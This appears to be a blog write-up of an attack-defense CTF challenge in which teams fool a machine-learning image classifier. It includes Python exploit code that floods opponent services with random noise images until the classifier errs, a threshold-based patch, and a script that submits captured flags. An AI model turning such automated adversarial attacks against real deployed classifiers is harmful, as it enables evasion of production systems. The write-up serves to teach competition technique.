728x90
The Intended solution was to make an adversarial example randomly and get gradient direction estimate at the boundary then update noise by HOPSKIPJUMP ATTACK to get more refined adversarial example.
My Approach however was I made an adversarial example randomly, and repeated until I can get a correct answer by an image I made... this was because we do not need to classification of 100% accuracy to get a correct answer which is to get a flag. This method was not available to get a flag after patching regards with accuracy tho ☹️
anyway my exploit code was below :p
import numpy as np
import random
import cv2
import os
import requests
import re
import imageio
def sendImage(path, team):
r = requests.post('http://10.13.37.{}:14045/predict'.format(team), files={'file':open(path,'rb')}, data={'brave':'on'})
# r = requests.post('http://127.0.0.1:5000/predict', files={'file':open(path,'rb')}, data={'brave':'on'}) # for local
percentage = re.search(r"\[.+\]", r.text).group(0)
idx = re.search(r"\<p\>[0-9]+", r.text).group(0)[3:]
return (percentage, idx)
def init(prob):
image = np.zeros((112,112,1))
output = np.zeros(image.shape,np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
output[i][j] = 0
else:
output[i][j] = random.randint(127,256)
return output
def sp_noise(image, prob):
output = np.zeros(image.shape,np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
output[i][j] = 0
elif rdn > thres:
output[i][j] = random.randint(1,256)
else:
output[i][j] = image[i][j]
return output
teams = [1,7,9,11,12,13,14,16]
while True:
cv2.imwrite('test.png', init(0.75))
for target in teams:
target = str(target)
percentages, result = sendImage("test.png", target)
if result != '64':
if not os.path.exists(f"./result/{target}"):
os.mkdir(f"./result/{target}")
os.system('cp test.png ./result/{}/{}.png'.format(target, result))Patch
#!/usr/bin/env python3
import imageio
import sys
import os
import keras
import numpy as np
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
gpu = tf.config.experimental.list_physical_devices('GPU')
if gpu:
tf.config.experimental.set_memory_growth(gpu[0], True)
COMPILE_OPTIONS = { 'loss': 'categorical_crossentropy', 'optimizer': 'adam', 'metrics': ['accuracy'] }
print("I fear....")
LOADED_MODEL = keras.models.load_model(sys.argv[1])
LOADED_MODEL.compile(**COMPILE_OPTIONS)
paths = [ sys.argv[2] ]
imgs = np.stack(np.expand_dims(imageio.imread(i) / 255, 2) for i in paths)
predictions = dict(zip(paths, map(list, LOADED_MODEL.predict(imgs))))
cls = next(iter(predictions.values()))
THRESH = 0.96
if max(cls) < THRESH:
assert False
assert sum(1 for p in imageio.read(sys.argv[2]).get_data(0).reshape(112*112) if p == 0) > 2000Sender
import numpy as np
import random
import cv2
import os
import requests
import re
import imageio
def getidx(team):
r = requests.get('http://10.13.37.{}:4045/'.format(str(team)))
idx = re.search(r"number ([0-9]+)", r.text).group(0)[7:]
return idx
def sendImage(path, team):
r = requests.post('http://10.13.37.{}:4045/predict'.format(str(team)), files={'file':open(path,'rb')}, data={'brave':'off'})
return re.search(r"[0-9A-F]{10,}", r.text).group(0)
def sendflag(flag):
r = requests.get(f'http://wuq.kr:6060/api/submit_flag/{flag}')
targets = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,16]
while True:
for team in targets:
#result/{team}/1.png
idx = getidx(team)
if os.path.exists(f'result/{team}/{idx}.png'):
try:
flag = sendImage(f"result/{team}/{idx}.png", team)
print(team, flag)
sendflag(flag)
except:
passGet a flag
728x90
'대회' 카테고리의 다른 글
| [TSG CTF 2021] giita (dompurify bypass via prototype pollution) (0) | 2022.01.11 |
|---|---|
| [CCE 2020] 사이버공격방어대회 예선 풀이 (1) | 2022.01.11 |
| [TokyoWesterns CTF 2020] Does linux dream of windows? (1) | 2022.01.10 |
| [bobctf 2020] Catcha (ML) (0) | 2022.01.10 |
댓글